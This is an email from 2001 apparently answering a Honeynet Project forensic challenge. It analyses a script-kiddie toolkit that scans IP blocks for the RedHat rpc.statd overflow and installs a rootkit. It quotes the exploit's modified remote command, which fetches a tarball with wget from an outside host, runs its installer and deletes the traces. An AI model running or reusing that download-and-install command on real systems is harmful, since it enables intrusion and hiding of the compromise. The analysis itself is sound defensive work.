From madman@xnet.com Fri Mar 23 10:14:25 2001 Date: Wed, 21 Mar 2001 12:22:34 -0600 (CST) From: Steve Maks To: project@honeynet.org Subject: March Scan Hopefully it's not too late to submit this, but here's my crack at it. 1. What is the blackhat attempting to do with his command line syntax? The luckgo script, in it's ANSI glory, attempts to hax0r the user specified IP address blocks. > Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210 Will try to hax0r the 216.210 class B and install a rootkit --- 2. What does the tool accomplish? The tool scans the specified netblocks for systems vulnerable to the rpc.statd overflow in RedHat 6.0/1/2. The bug is described in RedHat's advisory RHSA-2000:043-03. After successfully finding a vulnerable system it will then download and install a rootkit on the system. --- 3. How does the tool work? The luckgo script will run luckscan-a which will scan the specified IP blocks looking for an open port 111, then calling luckstatdx to attempt the rpc.statd exploit and install the rootkit. --- 4. Is this tool a worm, or would you classify it as something else? It's a script kiddie tool. --- 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? luckstatdx is a modified version of: *** statdx *** Redhat Linux 6.0/6.1/6.2 rpc.statd remote root exploit (IA32) *** by ron1n What is modified is the becsys taking credit for the exploit as well as the commands executed on the remote system. The original exploit executed "cd /; ls -alF; id" on the remote host whereas the modified version executes "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz ; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz" which downloads and installs the rootkit. There are also a few other printfs that becsys has modified. luckscan-a is a modified version of another large scale port scanner, which one specifically, I don't know. It searches for a user specified port, so most likely it was designed for the purpose of large scale scanning for a certain port. --- Bonus Question: What information can you obtain about who is using or created the tool? Anyone who is using the tool is most likely a script kiddie. The person who created the tool is most likely the same, but with a touch of C knowledge. The creator of the tarball also appears to be a Windows user due to the DOS style CRs in luckstatdx.c. And on an anal note, the archive should've been named luckroot.tar.gz or luckroot.tgz since it is a gziped tarball. The all caps filename is also usually a sign the file was FTPed from a Windows machine, but not necessarily.